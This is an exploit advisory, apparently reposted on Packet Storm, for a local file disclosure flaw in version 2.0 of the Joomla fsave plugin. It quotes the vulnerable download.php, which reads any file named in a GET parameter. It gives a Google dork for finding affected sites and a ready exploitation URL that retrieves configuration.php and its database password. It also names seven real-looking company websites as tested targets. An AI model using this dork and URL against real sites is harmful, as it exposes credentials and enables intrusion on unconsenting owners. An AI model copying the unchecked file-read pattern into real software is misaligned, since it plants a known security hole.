Joomla Fsave component version 2.0 suffers from a local file disclosure vulnerability.
df655568b820679e73add599495000f3078883f4e6eb30ca6bbf28621d8e398e
.__ _____ _______
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Joomla <= (fsave Plugin) Local File Disclosure Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Skype : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Greetz : b3mb4m, ZoRLu, Sen Haxor, Ne0-h4ck3r, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Joomla
|~Plugin : fsave
|~Affected Version : 2.0
|~Software : N/A
|~RISK : High
|~Google Dork : inurl:plugins/content/fsave/
===================================================================
======================Info=========================================
can be easily found in any database password for this "configuration.php" will be sufficient to read
possible to read the file on the local database.
incorrect coding and unconscious in it causing "download.php" file.
that's laughter reason codes:)
============ Error line's in download.php ===========================
<?php
define('JPATH_BASE', dirname(dirname(dirname(dirname(__FILE__)))));
$file = JPATH_BASE."/".$_GET['filename'];
header('Content-Description: File Transfer');
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=".basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header("Content-Length: " . filesize($file));
ob_clean();
flush();
readfile($file);
?>
======================================================================
======================== Tested on Demos ============================
http://www.gedore.pl
http://www.gedore.com.pl
http://www.rhodius.pl
http://rhodius.com.pl
http://loesomat.pl
http://carolus.com.pl
http://klann.pl
=======================================================================
========================= Exploitation ====================
http://[TARGET]/plugins/content/fsave/download.php?filename=configuration.php
=======================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed